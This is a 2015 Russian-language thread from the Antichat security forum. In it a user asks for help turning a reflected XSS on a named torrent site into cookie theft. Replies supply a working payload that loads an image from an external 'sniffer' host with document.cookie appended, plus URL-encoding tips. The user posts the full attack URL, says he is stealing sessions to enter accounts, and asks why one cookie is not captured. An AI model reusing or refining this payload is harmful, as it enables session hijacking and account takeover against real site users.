HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2015, 13:04
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg
 
Ответить с цитированием

  #2  
Старый 16.08.2015, 13:07
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Неудаляите пожалуста тему а то надаело мучятся
 
Ответить с цитированием

  #3  
Старый 16.08.2015, 14:25
hahanovB
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
Провел на форуме:
86887

Репутация: 2
По умолчанию

Цитата:
Сообщение от Octavian  

Неудаляите пожалуста тему а то надаело мучятся
У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...

Подробнее: тут
 
Ответить с цитированием

  #4  
Старый 16.08.2015, 17:29
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от hahanovB  

У тебя пассивка ищи активку и тогда сможешь запихнуть сниффер...
Подробнее:
тут
какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.

Цитата:
Сообщение от Octavian  

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro
где типерь запихнуть сылку сниффера помоги пожалуста
//hacker-lab.com/sniffer/images/251095_3.jpg
такого рода код:

'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'

не забудьте про URLEncode, плюсы в %2b, пробелы в +
 
Ответить с цитированием

  #5  
Старый 16.08.2015, 19:44
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от yarbabin  

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +
Друг можно всю сылку и чтоб провериная была о то многие типа помоглали но ничево на снифере неприходило,спасибо
 
Ответить с цитированием

  #6  
Старый 16.08.2015, 19:46
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

жутко пишу по русски прошу прощения ето не мои язык
 
Ответить с цитированием

  #7  
Старый 16.08.2015, 19:49
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от yarbabin  

какая разница? JS все равно, разница в том, что пользователю нужно сделать доп. действие.
такого рода код:
'+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'
не забудьте про URLEncode, плюсы в %2b, пробелы в +
http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro

нехочет так
 
Ответить с цитированием

  #8  
Старый 16.08.2015, 20:42
funny_kaplan
Познающий
Регистрация: 28.03.2013
Сообщений: 43
Провел на форуме:
16571

Репутация: 0
По умолчанию

Цитата:
Сообщение от Octavian  

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+((new
Image()).src='//hacker-lab.com/sniffer/images/251095_3.jpg'+document.cookie)+'&lang=ro
нехочет так
тогда так:

Цитата:
 
Ответить с цитированием

  #9  
Старый 17.08.2015, 16:19
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Цитата:
Сообщение от funny_kaplan  

тогда так:
друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg
 
Ответить с цитированием

  #10  
Старый 17.08.2015, 16:20
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

друзя очередная непонятное проблема,спомошю сылке ворую сесию она ворует все значение кроме kogaionon_data а без нео никак

нехочет пропустить в акаунт даже если остальные значение от акаутнта(1) а значение kogaionon_data ставлю от акаунта(2) меня

прапускает в акаунт(2),выходит что астальные значение неважно от каково акаунта,и почему kogaionon_data неворуется помогите ето моя первая хсс

http://incomas.md/shop/2015.jpg
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.